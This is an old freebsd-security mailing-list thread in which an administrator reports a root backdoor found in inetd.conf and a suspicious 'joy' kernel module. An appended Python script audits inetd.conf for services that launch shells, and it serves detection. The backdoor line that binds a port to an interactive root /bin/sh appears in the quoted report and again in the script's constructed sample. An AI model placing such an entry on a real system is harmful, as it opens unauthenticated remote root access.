From: Andrew R. Reiter (arr@watson.org)
Date: Thu Nov 01 2001 - 09:27:03 CST

    On Thu, 1 Nov 2001, Andrew R. Reiter wrote:

    :man 4 joy

    Though, it could be a coverup :-)

    :
    :On Thu, 1 Nov 2001, Ralph Huntington wrote:
    :
    ::I did find this kernel module, but I have no idea what it is. I presume at
    ::this point that the root shell acquired through inetd was for the purpose
    ::of loading this module. Anyone recognize it? Anyone want it for analysis?
    ::
    ::hoganklink:/etc# ll /usr/bin/joy
    ::-r-xr-xr-x 1 root wheel 100 Jul 4 12:05 /usr/bin/joy
    ::
    ::hoganklink:/etc# cat /usr/bin/joy
    ::#!/bin/sh
    ::# $FreeBSD: src/sys/modules/joy/joy.sh,v 1.5 1999/08/28 00:47:23 peter Exp $
    ::
    ::kldload joy
    ::
    ::
    ::hoganklink:/etc# ll /modules/joy.ko
    ::-r-xr-xr-x 1 root wheel 6755 Jul 4 12:05 /modules/joy.ko
    ::
    ::
    ::On Thu, 1 Nov 2001, Ralph Huntington wrote:
    ::
    ::> I have that sinking feeling. I discovered this line at the end of
    ::> inetd.conf on one of our servers:
    ::>
    ::> dlip stream tcp nowait root /bin/sh sh -i
    ::>
    ::> Looks like a root compromise. Sure enough, telnet'ing to the dlip port
    ::> provides what *looks* like a root shell, but I don't seem to be able to do
    ::> anything with it. Pretty mysterious.
    ::>
    ::> Can anyone offer a clue? Thanks in advance, Ralph
    ::>
    ::>
    ::>
    ::>
    ::> To Unsubscribe: send mail to majordomoFreeBSD.org
    ::> with "unsubscribe freebsd-security" in the body of the message
    ::>
    ::
    ::
    :
    :*-------------.................................................
    :| Andrew R. Reiter
    :| arr@fledge.watson.org
    :| "It requires a very unusual mind
    :| to undertake the analysis of the obvious" -- A.N. Whitehead
    :
    :

    *-------------.................................................
    | Andrew R. Reiter
    | arr@fledge.watson.org
    | "It requires a very unusual mind
    | to undertake the analysis of the obvious" -- A.N. Whitehead

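The backdoor Ralph found is an inetd.conf entry that binds a service to a root-owned interactive shell (`/bin/sh sh -i`). The audit script below is an added example, not code from the thread or from FreeBSD: it parses inetd.conf lines, normalises the `user[:group][/class]` field, and flags any entry whose server program or argv[0] is a shell interpreter, which is what a defender would run across a fleet to catch this pattern. The `SAMPLE_INETD_CONF` text is constructed for the demo; only the `dlip` line mirrors the entry quoted above, and the `internal` keyword line shows that built-in services (which have no program path) are handled.

```python
"""Audit inetd.conf for services that hand a connecting client a shell.

Added example for this thread; the sample configuration is constructed,
not taken from any real host.
"""
import re

# Interpreters an inetd service should never launch directly.
SHELL_BINARIES = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}

# Constructed sample: four normal entries plus the pattern seen in the thread.
SAMPLE_INETD_CONF = """\
# constructed inetd.conf sample
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
finger  stream  tcp     nowait  nobody  /usr/libexec/fingerd    fingerd -s
daytime stream  tcp     nowait  root    internal
dlip    stream  tcp     nowait  root    /bin/sh sh -i
"""


def parse_inetd(text):
    """Return one dict per active service entry; comments and blanks are skipped.

    Field layout: service socket proto wait user program [args...].
    Built-in services use the keyword 'internal' in place of a program path.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 6:
            continue  # malformed line; inetd would reject it too
        # user field may carry ':group', '.group' (Linux) or '/login-class' (FreeBSD)
        user = re.split(r"[:./]", fields[4], maxsplit=1)[0]
        entries.append({
            "line": lineno,
            "service": fields[0],
            "socket": fields[1],
            "proto": fields[2],
            "wait": fields[3],
            "user": user,
            "program": fields[5],
            "args": fields[6].split() if len(fields) > 6 else [],
        })
    return entries


def find_shell_services(text):
    """Flag entries whose program or argv[0] is a shell interpreter."""
    findings = []
    for e in parse_inetd(text):
        prog = e["program"].rsplit("/", 1)[-1]
        argv0 = e["args"][0].rsplit("/", 1)[-1] if e["args"] else ""
        if prog not in SHELL_BINARIES and argv0 not in SHELL_BINARIES:
            continue
        interactive = "-i" in e["args"]
        if interactive and e["user"] == "root":
            reason = "interactive root shell"
        elif interactive:
            reason = "interactive shell"
        else:
            reason = "shell interpreter as service"
        findings.append({
            "line": e["line"],
            "service": e["service"],
            "user": e["user"],
            "command": " ".join([e["program"]] + e["args"]),
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in find_shell_services(SAMPLE_INETD_CONF):
        print(f"line {f['line']}: {f['service']} runs '{f['command']}' "
              f"as {f['user']} -> {f['reason']}")
```

Run it against the real file with `find_shell_services(open("/etc/inetd.conf").read())`; an empty result is the expected state, and a `root` finding is worth treating as the same class of event the thread describes.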